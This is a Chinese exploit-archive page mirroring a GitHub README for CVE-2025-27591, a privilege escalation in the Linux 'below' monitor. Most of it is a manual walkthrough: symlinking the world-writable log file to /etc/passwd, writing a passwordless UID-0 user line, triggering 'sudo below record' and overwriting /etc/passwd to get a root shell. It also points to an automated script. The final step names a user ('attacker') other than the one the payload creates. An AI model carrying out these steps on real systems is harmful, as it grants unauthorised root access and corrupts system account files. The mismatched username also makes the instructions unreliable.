POC详情: 874472d058b230707d5a04a2ae4bb73e075b3b6a

来源
https://github.com/dollarboysushil/Linux-Privilege-Escalation-CVE-2025-27591
关联漏洞
标题: below 安全漏洞 (CVE-2025-27591)
描述:below是Meta Incubator开源的一个现代 Linux 系统的资源监视器。 below v0.9.0之前版本存在安全漏洞,该漏洞源于创建了全局可写目录,可能导致通过符号链接攻击提升到root权限。
描述
CVE-2025-27591 is a known privilege escalation vulnerability in the Below service (version < v0.9.0)
介绍
# CVE-2025-27591 - Privilege Escalation via Writable Symlink in `below`

## Summary

This is a simple exploit for **CVE-2025-27591**, a local privilege escalation vulnerability in the `below` Linux system monitoring tool. The vulnerability affects versions prior to v0.9.0 and stems from incorrect permission assignments in the system. The issue was discovered in January 2025 and publicly disclosed on March 12, 2025 (SecurityOnline, OpenWall). When `below` is run with `sudo`, it may log errors into a world-writable directory (`/var/log/below`), allowing attackers to symlink a log file to sensitive targets like `/etc/passwd`.

By exploiting this, an unprivileged user with `sudo` access to `below` can escalate privileges to root.

---

## Vulnerability Details

- **CVE ID**: CVE-2025-27591
- **Vulnerable Tool**: `below`
- **Affected Feature**: Logging via `below record`
- **Vulnerable Path**: `/var/log/below/error_root.log`
- **Attack Prerequisites**:
  - The directory `/var/log/below` is world-writable
  - The attacker can run `sudo /usr/bin/below record` without a password

---

# Exploit Steps (Manual)

✅ Step 1: Verify world-writable log directory
You should see:

```bash
drwxrwxrwx 2 root root 4096 ... /var/log/below
```

![alt text](/Images/image.png)

✅ Step 2: Remove any existing `error_root.log`

```bash
rm -f /var/log/below/error_root.log
```

✅ Step 3: Create a symlink to /etc/passwd

```bash
ln -s /etc/passwd /var/log/below/error_root.log
```

then check using

```bash
ls -la /var/log/below/error_root.log
# should show: error_root.log -> /etc/passwd
```

![alt text](/Images/image2.png)

✅ Step 4: Create a payload file
This will add a new root user attacker with no password:

```bash
echo 'dollarboysushil::0:0:dollarboysusil:/root:/bin/bash' > /tmp/payload
```

file structure

```bash
username:password:UID:GID:comment(home/full name):home_directory:shell
```

key thing here is, UID and GUID
we are setting UID and GUID to 0 making it user a root user and Group ID = root group
![alt text](/Images/image3.png)

✅ Step 5: Trigger log write as root
This is the core of the exploit.

```bash
sudo /usr/bin/below record
```

This command is expected to fail or timeout — but it will try to write error logs to /var/log/below/error_root.log, which is actually /etc/passwd.
💡 In some cases, this alone may corrupt /etc/passwd — so we overwrite it fully next.

✅ Step 6: Overwrite /etc/passwd via symlink

```bash
cp /tmp/payload /var/log/below/error_root.log
```

![alt text](/Images/image4.png)

✅ Step 7: Become root

```bash
su attacker
```

You'll drop into a root shell, no password needed.
![alt text](/Images/image5.png)

# Exploit Steps (Automatic)

```bash
python3 dbs_exploit.py
```

![alt text](/Images/image6.png)
文件快照

 [4.0K]  /data/pocs/874472d058b230707d5a04a2ae4bb73e075b3b6a
├── [1.6K]  dbs_exploit.py
├── [4.0K]  Images
│   ├── [137K]  image2.png
│   ├── [ 77K]  image3.png
│   ├── [ 23K]  image4.png
│   ├── [ 94K]  image5.png
│   ├── [268K]  image6.png
│   └── [ 45K]  image.png
└── [2.7K]  README.md

1 directory, 8 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。